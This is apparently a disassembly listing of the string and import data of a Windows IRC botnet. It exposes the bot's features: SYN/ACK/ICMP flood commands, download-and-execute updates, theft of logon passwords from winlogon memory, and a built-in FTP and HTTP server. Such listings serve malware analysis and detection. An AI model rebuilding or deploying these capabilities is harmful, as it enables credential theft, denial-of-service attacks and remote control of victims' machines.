dd 0A9BCAE53h, 0DEBB9EC5h, 47B2CF7Fh, 30B5FFE9h, 0BDBDF21Ch
dd 0CABAC28Ah, 53B39330h, 24B4A3A6h, 0BAD03605h, 0CDD70693h
dd 54DE5729h, 23D967BFh, 0B3667A2Eh, 0C4614AB8h, 5D681B02h
dd 2A6F2B94h, 0B40BBE37h, 0C30C8EA1h, 5A05DF1Bh, 2D02EF8Dh
dword_420978 dd 6272h ; sub_411FA9+121�o
aDdosSendErrorD db '[DDoS]: Send error: <%d>.',0 ; DATA XREF: sub_4021B5+30F�o
align 4
aDdos_random db 'ddos.random',0 ; DATA XREF: sub_4021B5+123�o
; sub_408A18+22A8�o
aDdos_ack db 'ddos.ack',0 ; DATA XREF: sub_4021B5+109�o
; sub_408A18+2294�o
align 10h
aDdos_syn db 'ddos.syn',0 ; DATA XREF: sub_4021B5+EF�o
; sub_408A18+2280�o
align 4
aDdosDoneWithFl db '[DDoS]: Done with flood (%iKB/sec).',0 ; DATA XREF: sub_40253C+5B�o
aDownloadBadUrl db '[DOWNLOAD]: Bad URL, or DNS Error: %s.',0 ; DATA XREF: sub_40260A+4B6�o
align 4
aDownloadUpda_0 db '[DOWNLOAD]: Update failed: Error executing file: %s.',0
; DATA XREF: sub_40260A+4A8�o
align 10h
aDownloadDown_0 db '[DOWNLOAD]: Downloaded %.1fKB to %s @ %.1fKB/sec. Updating.',0
; DATA XREF: sub_40260A+403�o
aDownloadExecut db '[DOWNLOAD]: Execution failed: Error executing file: %s.',0
; DATA XREF: sub_40260A:loc_4029C0�o
aDownloadApplic db '[DOWNLOAD]: Application succesfully executed: %s.',0
; DATA XREF: sub_40260A+3AC�o
align 4
asc_420AE8: ; DATA XREF: sub_40260A+346�o
; sub_404F24+25C�o ...
unicode 0, < >,0
aDownloadOpenni db '[DOWNLOAD]: Openning: %s %s.',0 ; DATA XREF: sub_40260A+2B4�o
align 4
aDownloadDownlo db '[DOWNLOAD]: Downloaded %.1f KB to %s @ %.1f KB/sec.',0
; DATA XREF: sub_40260A+24E�o
dbl_420B40 dq 9.765625e-4 ; DATA XREF: sub_40260A+21D�r
; sub_40260A:loc_402847�r ...
dbl_420B48 dq 4.294967296e9 ; DATA XREF: sub_40260A+215�r
; sub_40260A+237�r ...
aDownloadFilesi db '[DOWNLOAD]: Filesize is incorrect: (%d != %d).',0
; DATA XREF: sub_40260A+195�o
align 10h
aDownloadUpdate db '[DOWNLOAD]: Update: %s (%dKB transferred).',0
; DATA XREF: sub_40260A:loc_40276D�o
align 4
aDownloadFileDo db '[DOWNLOAD]: File download: %s (%dKB transferred).',0
; DATA XREF: sub_40260A+15C�o
align 10h
aDownloadCouldn db '[DOWNLOAD]: Couldn',27h,'t open file: %s.',0 ; DATA XREF: sub_40260A+77�o
aUnknown db 'Unknown',0 ; DATA XREF: sub_402BB0:loc_402BF3�o
; sub_4071EE+104�o
aInvalid db 'Invalid',0 ; DATA XREF: sub_402BB0:loc_402BED�o
aDisk db 'Disk',0 ; DATA XREF: sub_402BB0:loc_402BE7�o
align 4
aNetwork db 'Network',0 ; DATA XREF: sub_402BB0:loc_402BE1�o
aCdrom db 'Cdrom',0 ; DATA XREF: sub_402BB0:loc_402BDB�o
align 4
aRam db 'RAM',0 ; DATA XREF: sub_402BB0:loc_402BD5�o
a?: ; DATA XREF: sub_402BB0+1F�o
unicode 0, <?>,0
aFailed db 'failed',0 ; DATA XREF: sub_402C41:loc_402D19�o
; sub_402D5C+2D�o
align 4
aSkb db '%sKB',0 ; DATA XREF: sub_402C41+6C�o
align 4
aMainSDriveSSTo db '[MAIN]: %s Drive (%s): %s total, %s free, %s available.',0
; DATA XREF: sub_402D5C+7B�o
aMainSDriveSFai db '[MAIN]: %s Drive (%s): Failed to stat, device not ready.',0
; DATA XREF: sub_402D5C+45�o
align 4
aA db 'A:\',0 ; DATA XREF: sub_402E1B+39�o
aFoundSS db ' Found: %s\%s',0 ; DATA XREF: sub_402F79+107�o
align 4
aSS_0 db '%s\%s',0 ; DATA XREF: sub_402F79+45�o
; sub_40E745+195�o
align 4
aS_1 db '%s\*',0 ; DATA XREF: sub_402F79+14�o
align 4
aFindfileFilesF db '[FINDFILE]: Files found: %d.',0 ; DATA XREF: sub_4030CB+CF�o
align 4
aFindfileSearch db '[FINDFILE]: Searching for file: %s.',0 ; DATA XREF: sub_4030CB+66�o
aMsgina db 'MSGINA',0 ; DATA XREF: sub_4031EB+13E�o
align 4
aNwgina db 'NWGINA',0 ; DATA XREF: sub_4031EB+123�o
align 10h
aWinlogon db 'WINLOGON',0 ; DATA XREF: sub_4031EB+B9�o
align 10h
aFindpassTheWin db '[FINDPASS]: The Windows logon (Pid: <%d>) information is: Domain:'
; DATA XREF: sub_403637+6A�o
; sub_4036C9+A3�o
db ' \\%S, User: (%S/%S).',0
align 4
aFindpassTheW_0 db '[FINDPASS]: The Windows logon (Pid: <%d>) information is: Domain:'
; DATA XREF: sub_4036C9+C5�o
db ' \\%S, User: (%S/(N/A)).',0
align 4
aFindpassFailed db '[FINDPASS]: Failed to enable Debug Privilege.',0
; DATA XREF: sub_4037CA:loc_403941�o
align 4
aFindpassUnab_0 db '[FINDPASS]: Unable to find Winlogon Process ID.',0
; DATA XREF: sub_4037CA:loc_403915�o
aFindpassUnable db '[FINDPASS]: Unable to find the password in memory.',0
; DATA XREF: sub_4037CA:loc_40390E�o
align 4
aFindpassTheW_1 db '[FINDPASS]: The Windows logon (Pid: <%d>) information is: Domain:'
; DATA XREF: sub_4037CA+116�o
db ' \\%S, User: (%S/(no password)).',0
align 4
aUserdomain: ; DATA XREF: sub_4037CA+DB�o
unicode 0, <USERDOMAIN>,0
align 4
aUsername: ; DATA XREF: sub_4037CA+CD�o
unicode 0, <USERNAME>,0
align 4
aRtlrundecodeun db 'RtlRunDecodeUnicodeString',0 ; DATA XREF: sub_4037CA+99�o
align 4
aRtldestroyquer db 'RtlDestroyQueryDebugBuffer',0 ; DATA XREF: sub_4037CA+8C�o
align 10h
aRtlqueryproces db 'RtlQueryProcessDebugInformation',0 ; DATA XREF: sub_4037CA+7F�o
aRtlcreatequery db 'RtlCreateQueryDebugBuffer',0 ; DATA XREF: sub_4037CA+72�o
align 4
aNtquerysystemi db 'NtQuerySystemInformation',0 ; DATA XREF: sub_4037CA+67�o
align 4
aNtdll_dll db 'NTDLL.DLL',0 ; DATA XREF: sub_4037CA+54�o
align 4
aSedebugprivile db 'SeDebugPrivilege',0 ; DATA XREF: sub_4037CA+40�o
; sub_4037CA+160�o ...
align 4
aFindpassOnlySu db '[FINDPASS]: Only supported on Windows NT/2000.',0
; DATA XREF: sub_4037CA+35�o
align 4
a221Goodbye_ db '221 Goodbye.',0Ah,0 ; DATA XREF: sub_403C3B+542�o
align 4
aQuit db 'QUIT',0 ; DATA XREF: sub_403C3B+531�o
; sub_408A18+5DA�o
align 10h
a425CanTOpenDat db '425 Can',27h,'t open data connection.',0Ah,0
; DATA XREF: sub_403C3B+528�o
align 4
aFtpFileTransfe db '[FTP]: File transfer complete to IP: %s (%s).',0
; DATA XREF: sub_403C3B+4DC�o
align 4
a226TransferC_0 db '226 Transfer complete.',0Ah,0 ; DATA XREF: sub_403C3B+4C1�o
a150OpeningBina db '150 Opening BINARY mode data connection',0Ah,0
; DATA XREF: sub_403C3B+491�o
align 4
aRetr db 'RETR',0 ; DATA XREF: sub_403C3B:loc_4040B5�o
align 10h
a200PortCommand db '200 PORT command successful.',0Ah,0 ; DATA XREF: sub_403C3B+470�o
align 10h
aS_S_S_S db '%s.%s.%s.%s',0 ; DATA XREF: sub_403C3B+45E�o
aXX db '%x%x',0Ah,0 ; DATA XREF: sub_403C3B+42A�o
align 4
aS db '%*s %[^,],%[^,],%[^,],%[^,],%[^,],%[^',0Ah ; DATA XREF: sub_403C3B+3EC�o
db ']',0
aPort db 'PORT',0 ; DATA XREF: sub_403C3B:loc_403FF1�o
align 4
a226TransferCom db '226 Transfer complete',0Ah,0 ; DATA XREF: sub_403C3B+38E�o
align 4
aList db 'LIST',0 ; DATA XREF: sub_403C3B:loc_403FB7�o
align 4
a425PassiveNotS db '425 Passive not supported on this server',0Ah,0
; DATA XREF: sub_403C3B+350�o
align 10h
aPasv db 'PASV',0 ; DATA XREF: sub_403C3B:loc_403F78�o
align 4
a200TypeSetToI_ db '200 Type set to I.',0Ah,0 ; DATA XREF: sub_403C3B+333�o
aI: ; DATA XREF: sub_403C3B+31E�o
unicode 0, <I>,0
a200TypeSetToA_ db '200 Type set to A.',0Ah,0 ; DATA XREF: sub_403C3B+302�o
aA_0: ; DATA XREF: sub_403C3B+2ED�o
unicode 0, <A>,0
aType db 'TYPE',0 ; DATA XREF: sub_403C3B:loc_403F14�o
align 10h
a257IsCurrentDi db '257 "/" is current directory.',0Ah,0 ; DATA XREF: sub_403C3B+2CF�o
align 10h
off_4211C0 dd offset dword_445750 ; DATA XREF: sub_403C3B+2BD�o
a350Restarting_ db '350 Restarting.',0Ah,0 ; DATA XREF: sub_403C3B+2B1�o
align 4
aRest db 'REST',0 ; DATA XREF: sub_403C3B:loc_403ED9�o
align 10h
a215Stnyftpd db '215 StnyFtpd',0Ah,0 ; DATA XREF: sub_403C3B+294�o
align 10h
aSyst db 'SYST',0 ; DATA XREF: sub_403C3B:loc_403EBC�o
align 4
a230UserLoggedI db '230 User logged in.',0Ah,0 ; DATA XREF: sub_403C3B+277�o
align 10h
aPass db 'PASS',0 ; DATA XREF: sub_403C3B:loc_403E9F�o
align 4
a331PasswordReq db '331 Password required',0Ah,0 ; DATA XREF: sub_403C3B+25A�o
align 10h
aUser_0 db 'USER',0 ; DATA XREF: sub_403C3B+247�o
align 4
aSS_1 db '%s %s',0 ; DATA XREF: sub_403C3B+236�o
align 10h
a220Winftpd1_2 db '220 WinFtpd 1.2',0Ah,0 ; DATA XREF: sub_403C3B+1BA�o
align 4
aFoundIFilesAnd db 'Found: %i Files and %i Directories',0Dh,0Ah,0
; DATA XREF: sub_4041E2+6BB�o
align 10h
aTrTdColspan3_0 db '<TR>',0Dh,0Ah ; DATA XREF: sub_4041E2+6A6�o
db '<TD COLSPAN="3"><HR></TD>',0Dh,0Ah
db '</TR>',0Dh,0Ah
db '</TABLE>',0Dh,0Ah
db '</BODY>',0Dh,0Ah
db '</HTML>',0Dh,0Ah,0
align 4
aPrivmsgSFoundS db 'PRIVMSG %s :Found %s Files and %s Directories',0Ah,0
; DATA XREF: sub_4041E2+68B�o
align 4
a31s21sIBytes db '%-31s %-21s (%i bytes)',0Dh,0Ah,0 ; DATA XREF: sub_4041E2+5F1�o
align 8
aTdTdWidthDCo_0 db '</TD>',0Dh,0Ah ; DATA XREF: sub_4041E2+5C9�o
db '<TD WIDTH="%d"><CODE>%s</CODE></TD>',0Dh,0Ah
db '<TD WIDTH="%d" ALIGN="right"><CODE>%dk</CODE></TD>',0Dh,0Ah
db '</TR>',0Dh,0Ah,0
aCodeSCodeA_0 db '"><CODE>%s</CODE></A>',0 ; DATA XREF: sub_4041E2:loc_404763�o
align 4
aCode_30sGtCode db '"><CODE>%.30s></CODE></A>',0 ; DATA XREF: sub_4041E2+57A�o
align 4
aSS db '%s%s',0 ; DATA XREF: sub_4041E2+523�o
; sub_404C6A+E6�o ...
align 10h
aPrivmsgS31s2_0 db 'PRIVMSG %s :%-31s %-21s (%s bytes)',0Ah,0 ; DATA XREF: sub_4041E2+4C5�o
align 4
a31s21s db '%-31s %-21s',0Dh,0Ah,0 ; DATA XREF: sub_4041E2+484�o
align 4
aTdTdWidthDCode db '</TD>',0Dh,0Ah ; DATA XREF: sub_4041E2+451�o
db '<TD WIDTH="%d"><CODE>%s</CODE></TD>',0Dh,0Ah
db '<TD WIDTH="%d" ALIGN="right"><CODE>-</CODE></TD>',0Dh,0Ah
db '</TR>',0Dh,0Ah,0
align 10h
aCodeSCodeA db '"><CODE>%s/</CODE></A>',0 ; DATA XREF: sub_4041E2:loc_4045F5�o
align 4
aCode_29sGtCode db '"><CODE>%.29s>/</CODE></A>',0 ; DATA XREF: sub_4041E2+40C�o
align 4
aSS_2 db '%s%s/',0 ; DATA XREF: sub_4041E2+3B5�o
align 10h
aTrTdWidthDAHre db '<TR>',0Dh,0Ah ; DATA XREF: sub_4041E2+36C�o
; sub_4041E2+4DA�o
db '<TD WIDTH="%d"><A HREF="',0
align 10h
aPrivmsgS31s21s db 'PRIVMSG %s :%-31s %-21s',0Ah,0 ; DATA XREF: sub_4041E2+33B�o
align 4
aS_0 db '<%s>',0 ; DATA XREF: sub_4041E2+311�o
; sub_4041E2+463�o
align 4
a2_2d2_2d4d2_2d db '%2.2d/%2.2d/%4d %2.2d:%2.2d %s',0 ; DATA XREF: sub_4041E2+2E5�o
aAm db 'AM',0 ; DATA XREF: sub_4041E2+2C4�o
; .data:0042E1A0�o
align 4
aPm db 'PM',0 ; DATA XREF: sub_4041E2+2B9�o
; .data:0042E1A4�o
align 4
a__0: ; DATA XREF: sub_4041E2+27C�o
unicode 0, <.>,0
a__ db '..',0 ; DATA XREF: sub_4041E2+264�o
align 8
aTrTdColspan3AH db '<TR>',0Dh,0Ah ; DATA XREF: sub_4041E2+1F0�o
db '<TD COLSPAN="3"><A HREF="%s"><CODE>Parent Directory</CODE></A></T'
db 'D>',0Dh,0Ah
db '</TR>',0Dh,0Ah,0
align 4
aSearchingForS db 'Searching for: %s',0Dh,0Ah,0 ; DATA XREF: sub_4041E2+15C�o
aTrTdColspan3Hr db '<TR>',0Dh,0Ah ; DATA XREF: sub_4041E2+144�o
db '<TD COLSPAN="3"><HR></TD>',0Dh,0Ah
db '</TR>',0Dh,0Ah,0
align 10h
aTrTdWidthDCode db '<TR>',0Dh,0Ah ; DATA XREF: sub_4041E2+107�o
db '<TD WIDTH="%d"><CODE>Name</CODE></TD>',0Dh,0Ah
db '<TD WIDTH="%d"><CODE>Last Modified</CODE></TD>',0Dh,0Ah
db '<TD WIDTH="%d" ALIGN="right"><CODE>Size</CODE></TD>',0Dh,0Ah
db '</TR>',0Dh,0Ah,0
align 4
aH1IndexOfSH1Ta db '<H1>Index of %s</H1>',0Dh,0Ah ; DATA XREF: sub_4041E2+B4�o
db '<TABLE BORDER="0">',0Dh,0Ah,0
align 4
aHtmlHeadTitleI db '<HTML>',0Dh,0Ah ; DATA XREF: sub_4041E2+75�o
db '<HEAD>',0Dh,0Ah
db '<TITLE>Index of %s</TITLE>',0Dh,0Ah
db '</HEAD>',0Dh,0Ah
db '<BODY>',0Dh,0Ah,0
align 4
aPrivmsgSSearch db 'PRIVMSG %s :Searching for: %s',0Dh,0Ah,0 ; DATA XREF: sub_4041E2+3F�o
asc_4216D8: ; DATA XREF: sub_4041E2+1E�o
; sub_404C6A+F7�o ...
dw 0Ah
unicode 0, <>,0
aSSHttp1_1Refer db '%s %s HTTP/1.1',0Ah ; DATA XREF: sub_4049D5+8A�o
db 'Referer: %s',0Ah
db 'Host: %s',0Ah
db 'Connection: close',0Ah
db 0Ah,0
align 8
aHttp1_0200Ok_0 db 'HTTP/1.0 200 OK',0Dh,0Ah ; DATA XREF: sub_404AFC+E4�o
db 'Server: myBot',0Dh,0Ah
db 'Cache-Control: no-cache,no-store,max-age=0',0Dh,0Ah
db 'pragma: no-cache',0Dh,0Ah
db 'Content-Type: %s',0Dh,0Ah
db 'Content-Length: %i',0Dh,0Ah
db 'Accept-Ranges: bytes',0Dh,0Ah
db 'Date: %s %s GMT',0Dh,0Ah
db 'Last-Modified: %s %s GMT',0Dh,0Ah
db 'Expires: %s %s GMT',0Dh,0Ah
db 'Connection: close',0Dh,0Ah
db 0Dh,0Ah,0
align 4
aHttp1_0200OkSe db 'HTTP/1.0 200 OK',0Dh,0Ah ; DATA XREF: sub_404AFC+CA�o
db 'Server: myBot',0Dh,0Ah
db 'Cache-Control: no-cache,no-store,max-age=0',0Dh,0Ah
db 'pragma: no-cache',0Dh,0Ah
db 'Content-Type: %s',0Dh,0Ah
db 'Accept-Ranges: bytes',0Dh,0Ah
db 'Date: %s %s GMT',0Dh,0Ah
db 'Last-Modified: %s %s GMT',0Dh,0Ah
db 'Expires: %s %s GMT',0Dh,0Ah
db 'Connection: close',0Dh,0Ah
db 0Dh,0Ah,0
align 4
aHhMmSs db 'HH:mm:ss',0 ; DATA XREF: sub_404AFC+94�o
; sub_41175C+17D�o ...
align 10h
aDddDdMmmYyyy db 'ddd, dd MMM yyyy',0 ; DATA XREF: sub_404AFC+7B�o
align 4
aApplicationOct db 'application/octet-stream',0 ; DATA XREF: sub_404AFC:loc_404B64�o
align 10h
aTextHtml db 'text/html',0 ; DATA XREF: sub_404AFC+61�o
align 4
aHttpdFailedT_0 db '[HTTPD]: Failed to start worker thread, error: <%d>.',0
; DATA XREF: sub_404C6A+287�o
align 4
aHttpdWorkerThr db '[HTTPD]: Worker thread of server thread: %d.',0
; DATA XREF: sub_404C6A+213�o
align 4
asc_421994: ; DATA XREF: sub_404C6A+16E�o
unicode 0, <*>,0
aS_2 db '%s',0 ; DATA XREF: sub_404C6A+31�o
; sub_4056FB+44�o ...
align 4
aS_8 db '\%s',0 ; DATA XREF: sub_404C6A+27�o
aHttpdErrorServ db '[HTTPD]: Error: server failed, returned: <%d>.',0
; DATA XREF: sub_404F24+3E0�o
align 10h
asc_4219D0 db 0Dh,0Ah,0 ; DATA XREF: sub_404F24+296�o
align 4
aGet db 'GET ',0 ; DATA XREF: sub_404F24+22D�o
align 10h
aIcmpErrorSendi db '[ICMP]: Error sending packets to IP: %s. Packets sent: %d. Return'
; DATA XREF: sub_405367+2F2�o
db 'ed: <%d>.',0
align 10h
aIcmpDoneWithSF db '[ICMP]: Done with %s flood to IP: %s. Sent: %d packet(s) @ %dKB/s'
; DATA XREF: sub_405367+288�o
db 'ec (%dMB).',0
aIcmpInvalidTar db '[ICMP]: Invalid target IP.',0 ; DATA XREF: sub_405367+B6�o
align 4
aIcmpErrorSetso db '[ICMP]: Error: setsockopt() failed, returned: <%d>.',0
; DATA XREF: sub_405367+8E�o
aIcmpErrorSocke db '[ICMP]: Error: socket() failed, returned: <%d>.',0
; DATA XREF: sub_405367+49�o
aSSS db '%s %s :%s',0Dh,0Ah,0 ; DATA XREF: sub_4056FB+69�o
aPrivmsg db 'PRIVMSG',0 ; DATA XREF: sub_4056FB+16�o
; sub_408A18+700�o
aNotice db 'NOTICE',0 ; DATA XREF: sub_4056FB+F�o
; sub_408A18+70E�o
align 4
aSqldisconnect db 'SQLDisconnect',0 ; DATA XREF: sub_4057AC+B8C�o
align 4
aSqlfreehandle db 'SQLFreeHandle',0 ; DATA XREF: sub_4057AC+B7F�o
align 4
aSqlallochandle db 'SQLAllocHandle',0 ; DATA XREF: sub_4057AC+B72�o
align 4
aSqlexecdirect db 'SQLExecDirect',0 ; DATA XREF: sub_4057AC+B65�o
align 4
aSqlsetenvattr db 'SQLSetEnvAttr',0 ; DATA XREF: sub_4057AC+B58�o
align 4
aSqldriverconne db 'SQLDriverConnect',0 ; DATA XREF: sub_4057AC+B50�o
align 4
aOdbc32_dll db 'odbc32.dll',0 ; DATA XREF: sub_4057AC:loc_4062EF�o
align 4
aShchangenotify db 'SHChangeNotify',0 ; DATA XREF: sub_4057AC+B0E�o
align 4
aShellexecutea db 'ShellExecuteA',0 ; DATA XREF: sub_4057AC+B06�o
align 4
aShell32_dll db 'shell32.dll',0 ; DATA XREF: sub_4057AC:loc_4062A5�o
aWnetcancelco_0 db 'WNetCancelConnection2W',0 ; DATA XREF: sub_4057AC+AB4�o
align 4
aWnetcancelconn db 'WNetCancelConnection2A',0 ; DATA XREF: sub_4057AC+AA7�o
align 4
aWnetaddconne_0 db 'WNetAddConnection2W',0 ; DATA XREF: sub_4057AC+A9A�o
aWnetaddconnect db 'WNetAddConnection2A',0 ; DATA XREF: sub_4057AC+A92�o
aMpr_dll db 'mpr.dll',0 ; DATA XREF: sub_4057AC:loc_406231�o
aDeleteipnetent db 'DeleteIpNetEntry',0 ; DATA XREF: sub_4057AC+A50�o
align 4
aGetipnettable db 'GetIpNetTable',0 ; DATA XREF: sub_4057AC+A48�o
align 4
aIphlpapi_dll db 'iphlpapi.dll',0 ; DATA XREF: sub_4057AC:loc_4061E7�o
align 4
aDnsflushreso_0 db 'DnsFlushResolverCacheEntry_A',0 ; DATA XREF: sub_4057AC+A06�o
align 4
aDnsflushresolv db 'DnsFlushResolverCache',0 ; DATA XREF: sub_4057AC+9FE�o
align 10h
aDnsapi_dll db 'dnsapi.dll',0 ; DATA XREF: sub_4057AC:loc_40619D�o
align 4
aNetmessagebuff db 'NetMessageBufferSend',0 ; DATA XREF: sub_4057AC+974�o
align 4
aNetusergetinfo db 'NetUserGetInfo',0 ; DATA XREF: sub_4057AC+967�o
align 4
aNetuserenum db 'NetUserEnum',0 ; DATA XREF: sub_4057AC+95A�o
aNetuserdel db 'NetUserDel',0 ; DATA XREF: sub_4057AC+94D�o
align 4
aNetuseradd db 'NetUserAdd',0 ; DATA XREF: sub_4057AC+940�o
align 4
aNetremotetod db 'NetRemoteTOD',0 ; DATA XREF: sub_4057AC+933�o
align 4
aNetapibufferfr db 'NetApiBufferFree',0 ; DATA XREF: sub_4057AC+926�o
align 4
aNetschedulejob db 'NetScheduleJobAdd',0 ; DATA XREF: sub_4057AC+919�o
align 10h
aNetshareenum db 'NetShareEnum',0 ; DATA XREF: sub_4057AC+90C�o
align 10h
aNetsharedel db 'NetShareDel',0 ; DATA XREF: sub_4057AC+8FF�o
aNetshareadd db 'NetShareAdd',0 ; DATA XREF: sub_4057AC+8F7�o
aNetapi32_dll db 'netapi32.dll',0 ; DATA XREF: sub_4057AC:loc_406092�o
align 4
aIcmpsendecho db 'IcmpSendEcho',0 ; DATA XREF: sub_4057AC+8A9�o
align 4
aIcmpclosehandl db 'IcmpCloseHandle',0 ; DATA XREF: sub_4057AC+89C�o
aIcmpcreatefile db 'IcmpCreateFile',0 ; DATA XREF: sub_4057AC+894�o
align 4
aIcmp_dll db 'icmp.dll',0 ; DATA XREF: sub_4057AC:loc_406033�o
align 4
aMozilla4_0Comp db 'Mozilla/4.0 (compatible)',0 ; DATA XREF: sub_4057AC+85A�o
align 10h
aInternetcloseh db 'InternetCloseHandle',0 ; DATA XREF: sub_4057AC+7E8�o
aInternetreadfi db 'InternetReadFile',0 ; DATA XREF: sub_4057AC+7DB�o
align 4
aInternetcracku db 'InternetCrackUrlA',0 ; DATA XREF: sub_4057AC+7CE�o
align 4
aInternetopenur db 'InternetOpenUrlA',0 ; DATA XREF: sub_4057AC+7C1�o
align 10h
aInternetopena db 'InternetOpenA',0 ; DATA XREF: sub_4057AC+7B4�o
align 10h
aInternetconnec db 'InternetConnectA',0 ; DATA XREF: sub_4057AC+7A7�o
align 4
aHttpsendreques db 'HttpSendRequestA',0 ; DATA XREF: sub_4057AC+79A�o
align 4
aHttpopenreques db 'HttpOpenRequestA',0 ; DATA XREF: sub_4057AC+78D�o
align 4
aInternetgetc_0 db 'InternetGetConnectedStateEx',0 ; DATA XREF: sub_4057AC+780�o
aInternetgetcon db 'InternetGetConnectedState',0 ; DATA XREF: sub_4057AC+778�o
align 4
aWininet_dll db 'wininet.dll',0 ; DATA XREF: sub_4057AC:loc_405F13�o
aClosesocket db 'closesocket',0 ; DATA XREF: sub_4057AC+62E�o
aGetpeername db 'getpeername',0 ; DATA XREF: sub_4057AC+621�o
aGethostbyaddr db 'gethostbyaddr',0 ; DATA XREF: sub_4057AC+614�o
align 4
aGethostbyname db 'gethostbyname',0 ; DATA XREF: sub_4057AC+607�o
align 4
aGethostname db 'gethostname',0 ; DATA XREF: sub_4057AC+5FA�o
aGetsockname db 'getsockname',0 ; DATA XREF: sub_4057AC+5ED�o
aSetsockopt db 'setsockopt',0 ; DATA XREF: sub_4057AC+5E0�o
align 4
aAccept db 'accept',0 ; DATA XREF: sub_4057AC+5D3�o
align 4
aListen db 'listen',0 ; DATA XREF: sub_4057AC+5C6�o
align 4
aSelect db 'select',0 ; DATA XREF: sub_4057AC+5B9�o
align 4
aBind db 'bind',0 ; DATA XREF: sub_4057AC+5B1�o
align 4
aRecvfrom db 'recvfrom',0 ; DATA XREF: sub_4057AC+59F�o
align 4
aRecv db 'recv',0 ; DATA XREF: sub_4057AC+592�o
align 10h
aSendto db 'sendto',0 ; DATA XREF: sub_4057AC+585�o
align 4
aSend db 'send',0 ; DATA XREF: sub_4057AC+578�o
; sub_408A18+1E04�o
align 10h
aNtohl db 'ntohl',0 ; DATA XREF: sub_4057AC+56B�o
align 4
aNtohs db 'ntohs',0 ; DATA XREF: sub_4057AC+55E�o
align 10h
aHtonl db 'htonl',0 ; DATA XREF: sub_4057AC+551�o
align 4
aHtons db 'htons',0 ; DATA XREF: sub_4057AC+544�o
align 10h
aInet_addr db 'inet_addr',0 ; DATA XREF: sub_4057AC+537�o
align 4
aInet_ntoa db 'inet_ntoa',0 ; DATA XREF: sub_4057AC+52A�o
align 4
aConnect db 'connect',0 ; DATA XREF: sub_4057AC+51D�o
aIoctlsocket db 'ioctlsocket',0 ; DATA XREF: sub_4057AC+510�o
aSocket db 'socket',0 ; DATA XREF: sub_4057AC+503�o
align 4
aWsacleanup db 'WSACleanup',0 ; DATA XREF: sub_4057AC+4F6�o
align 10h
aWsagetlasterro db 'WSAGetLastError',0 ; DATA XREF: sub_4057AC+4E9�o
aWsaioctl db 'WSAIoctl',0 ; DATA XREF: sub_4057AC+4DC�o
align 4
a__wsafdisset db '__WSAFDIsSet',0 ; DATA XREF: sub_4057AC+4CF�o
align 4
aWsaasyncselect db 'WSAAsyncSelect',0 ; DATA XREF: sub_4057AC+4C2�o
align 4
aWsasocketa db 'WSASocketA',0 ; DATA XREF: sub_4057AC+4B5�o
align 4
aWsastartup db 'WSAStartup',0 ; DATA XREF: sub_4057AC+4AD�o
align 4
aWs2_32_dll db 'ws2_32.dll',0 ; DATA XREF: sub_4057AC+49C�o
align 10h
aDeleteobject db 'DeleteObject',0 ; DATA XREF: sub_4057AC+429�o
align 10h
aDeletedc db 'DeleteDC',0 ; DATA XREF: sub_4057AC+41C�o
align 4
aBitblt db 'BitBlt',0 ; DATA XREF: sub_4057AC+40F�o
align 4
aSelectobject db 'SelectObject',0 ; DATA XREF: sub_4057AC+402�o
align 4
aGetdibcolortab db 'GetDIBColorTable',0 ; DATA XREF: sub_4057AC+3F5�o
align 4
aGetdevicecaps db 'GetDeviceCaps',0 ; DATA XREF: sub_4057AC+3E8�o
align 4
aCreatecompatib db 'CreateCompatibleDC',0 ; DATA XREF: sub_4057AC+3DB�o
align 4
aCreatedibsecti db 'CreateDIBSection',0 ; DATA XREF: sub_4057AC+3CE�o
align 10h
aCreatedca db 'CreateDCA',0 ; DATA XREF: sub_4057AC+3C6�o
align 4
aGdi32_dll db 'gdi32.dll',0 ; DATA XREF: sub_4057AC:loc_405B61�o
align 4
aGetusernamea db 'GetUserNameA',0 ; DATA XREF: sub_4057AC:loc_405B39�o
align 4
aIsvalidsecurit db 'IsValidSecurityDescriptor',0 ; DATA XREF: sub_4057AC+335�o
align 4
aEnumservicesst db 'EnumServicesStatusA',0 ; DATA XREF: sub_4057AC+328�o
aCloseserviceha db 'CloseServiceHandle',0 ; DATA XREF: sub_4057AC+31B�o
align 4
aDeleteservice db 'DeleteService',0 ; DATA XREF: sub_4057AC+30E�o
align 4
aControlservice db 'ControlService',0 ; DATA XREF: sub_4057AC+301�o
align 4
aStartservicea db 'StartServiceA',0 ; DATA XREF: sub_4057AC+2F4�o
align 4
aOpenservicea db 'OpenServiceA',0 ; DATA XREF: sub_4057AC+2E7�o
align 4
aOpenscmanagera db 'OpenSCManagerA',0 ; DATA XREF: sub_4057AC:loc_405A8B�o
align 4
aAdjusttokenpri db 'AdjustTokenPrivileges',0 ; DATA XREF: sub_4057AC+2AF�o
align 4
aLookupprivileg db 'LookupPrivilegeValueA',0 ; DATA XREF: sub_4057AC+2A2�o
align 4
aOpenprocesstok db 'OpenProcessToken',0 ; DATA XREF: sub_4057AC:loc_405A46�o
align 10h
aRegclosekey db 'RegCloseKey',0 ; DATA XREF: sub_4057AC+252�o
aRegdeletevalue db 'RegDeleteValueA',0 ; DATA XREF: sub_4057AC+245�o
aRegqueryvaluee db 'RegQueryValueExA',0 ; DATA XREF: sub_4057AC+238�o
align 10h
aRegsetvalueexa db 'RegSetValueExA',0 ; DATA XREF: sub_4057AC+22B�o
align 10h
aRegcreatekeyex db 'RegCreateKeyExA',0 ; DATA XREF: sub_4057AC+21E�o
aRegopenkeyexa db 'RegOpenKeyExA',0 ; DATA XREF: sub_4057AC+216�o
align 10h
aAdvapi32_dll db 'advapi32.dll',0 ; DATA XREF: sub_4057AC:loc_4059B1�o
align 10h
aExitwindowsex db 'ExitWindowsEx',0 ; DATA XREF: sub_4057AC+1A0�o
align 10h
aCloseclipboard db 'CloseClipboard',0 ; DATA XREF: sub_4057AC+193�o
align 10h
aGetclipboardda db 'GetClipboardData',0 ; DATA XREF: sub_4057AC+186�o
align 4
aOpenclipboard db 'OpenClipboard',0 ; DATA XREF: sub_4057AC+179�o
align 4
aDestroywindow db 'DestroyWindow',0 ; DATA XREF: sub_4057AC+16C�o
align 4
aIswindow db 'IsWindow',0 ; DATA XREF: sub_4057AC+15F�o
align 10h
aFindwindowa db 'FindWindowA',0 ; DATA XREF: sub_4057AC+152�o
aSendmessagea db 'SendMessageA',0 ; DATA XREF: sub_4057AC+14A�o
align 4
aUser32_dll db 'user32.dll',0 ; DATA XREF: sub_4057AC:loc_4058E1�o
; sub_41E453+13�o
align 4
aRegisterservic db 'RegisterServiceProcess',0 ; DATA XREF: sub_4057AC:loc_4058B4�o
align 10h
